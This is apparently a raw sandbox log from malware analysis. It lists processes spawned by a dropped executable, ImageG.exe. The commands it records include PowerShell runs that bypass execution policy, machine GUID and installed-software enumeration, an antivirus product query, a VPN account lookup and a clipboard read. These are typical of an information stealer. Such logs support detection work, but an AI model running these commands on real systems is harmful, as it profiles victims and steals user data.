        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell -ExecutionPolicy Bypass -NoProfile -File "C:\Users\user\AppData\Local\Temp\error_script.ps1""
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -NoProfile -File "C:\Users\user\AppData\Local\Temp\error_script.ps1"
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe Process created: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe "C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\desenamoreis" --mojo-platform-channel-handle=2424 --field-trial-handle=1704,i,16015974932036603911,12011319821735698167,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "findstr /C:"Detected boot environment" "%windir%\Panther\setupact.log""
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /C:"Detected boot environment" "C:\Windows\Panther\setupact.log"
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Cryptography" /v MachineGuid"
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Cryptography" /v MachineGuid
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall""
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "echo %COMPUTERNAME%.%USERDNSDOMAIN%"
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall"
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall""
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall"
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook""
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook"
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager""
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager"
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx""
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx"
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DXM_Runtime""
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DXM_Runtime"
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore""
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore"
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\HomeBusiness2019Retail - en-us""
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\HomeBusiness2019Retail - en-us"
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40""
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40"
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data""
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data"
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX""
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX"
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData""
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData"
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Microsoft Edge""
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Microsoft Edge"
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack""
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "findstr /C:"Detected boot environment" "%windir%\Panther\setupact.log""
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack"
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox 91.0.1 (x64 en-GB)""
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /C:"Detected boot environment" "C:\Windows\Panther\setupact.log"
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox 91.0.1 (x64 en-GB)"
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MozillaMaintenanceService""
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MozillaMaintenanceService"
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MPlayer2""
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MPlayer2"
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent""
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent"
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{6798C408-2636-448C-8AC6-F4E341102D27}""
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{6798C408-2636-448C-8AC6-F4E341102D27}"
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{7B981965-2FBC-433C-B4B3-E183EE97CD29}""
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{7B981965-2FBC-433C-B4B3-E183EE97CD29}"
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-007E-0000-1000-0000000FF1CE}""
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-007E-0000-1000-0000000FF1CE}"
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0000-1000-0000000FF1CE}""
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0000-1000-0000000FF1CE}"
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{B652B695-C849-4EF2-B09A-72771C7AD2BA}""
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{B652B695-C849-4EF2-B09A-72771C7AD2BA}"
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "mullvad account get"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist /FO CSV /NH"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntiVirusProduct | Format-List displayName, instanceGuid, pathToSignedProductExe, pathToSignedReportingExe, productState, timestamp""
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO CSV /NH
